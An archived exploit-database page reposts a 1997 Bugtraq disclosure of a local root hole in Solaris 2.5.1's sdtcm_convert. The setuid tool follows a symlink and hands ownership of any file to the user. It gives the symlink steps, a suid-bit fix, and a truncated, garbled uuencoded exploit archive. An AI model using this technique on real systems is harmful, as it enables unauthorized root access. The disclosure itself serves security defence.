Solaris 2.5.1 sdtcm_convert hole

Summary

Description:	sdtcm_convert is kind enough to watch the permissions of your calendar file and if you change them it will change them back ... even following symlinks ;)
Author:	Cristian SCHIPOR (skipo@SUNDY.CS.PUB.RO)
Compromise:	root (local)
Vulnerable Systems:	Solaris at least 2.5.1
Date:	22 February 1996

Details

Exploit:

Date: Sat, 22 Feb 1997 17:07:23 +0200
From: Cristian SCHIPOR 
To: BUGTRAQ@NETSPACE.ORG
Subject: Security hole in Solaris 2.5 (sdtcm_convert) + exploit

Sat Feb 22 15:25:48 EET 1997 Romania

Another hole in Solaris

I have found a security hole in sdtcm_convert on Solaris 2.5.1.
sdtcm_convert - calendar data conversion utility - allows any user to
change the owner for any file (or directory) from the system or gain root
access. The exploit is very simple. Change the permision mode of your calendar
file (callog.YOU) from /var/spool/calendar directory (usual r--rw----) and run
sdtcm_convert. sdtcm_convert 'll observe the change and 'll want  to
correct it (it 'll ask you first). You have only to delete the callog file
and make a symbolic link to a target file and your calendar file and said to
sdtcm_convert 'y' (yes). sdtcm_convert 'll make you the owner of target
file ...
A simple way to correct this is to get out suid_exec bit from
sdtcm_convert

I made an exploit, so you have to extract the text, uudecode it, and exec
a 'tar -xf exploit.tar'. You'll get the files in exploit_dir.

Cristian Schipor - Computer Science Faculty - Bucharest - Romania

Email: skipo@math.pub.ro skipo@sundy.cs.pub.ro skipo@ns.ima.ro
Phone: (401) 410.60.88

begin 600 exploit.tar
M97AP;&]I=%]D:7(O4D5!1$U%
M
M             # Q,# V,#  ,# P,#0V,  P,# P-#4W # P,# P,# Q,#(Q
M # V,S S-32YC7!E2AT87)G970L87)G=ELQ72D["@ES=')C<'DH
MPH)"7!E&ET*# I.PH)?0D*"6EF*'!I9#UF;W)K*"D]/3 I"@E["@D)9F]R*&D]
M,#MI/#,P,# P,# P.VDK*RD["@D)=6YL:6YK*'-H:69T*3L*"0ES>6UL:6YK
M*'1A5QN(BQS:7IE
M;V8H(GE<;B(I*3L*"7T)"0D)"@EE;'-E( H)>PH)"6-L;W-E*# I.PH)"61U
M<"AF:6QE9&5S6S!=*3L*"0ES>7-T96TH(FQE;6]N(BD["@D)

More
Exploits!

The master index of all exploits is available
here (Very large file)

Or you can pick your favorite operating system:

All OS's
Linux
Solaris/SunOS
Micro$oft

*BSD
Macintosh
AIX
IRIX

ULTRIX/Digital UNIX
HP/UX
SCO
Remote exploits

This page is part of  Fyodor's exploit
world.  
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap.  Or try these Insecure.Org resources:

All OS's	Linux	Solaris/SunOS	Micro$oft
*BSD	Macintosh	AIX	IRIX
ULTRIX/Digital UNIX	HP/UX	SCO	Remote exploits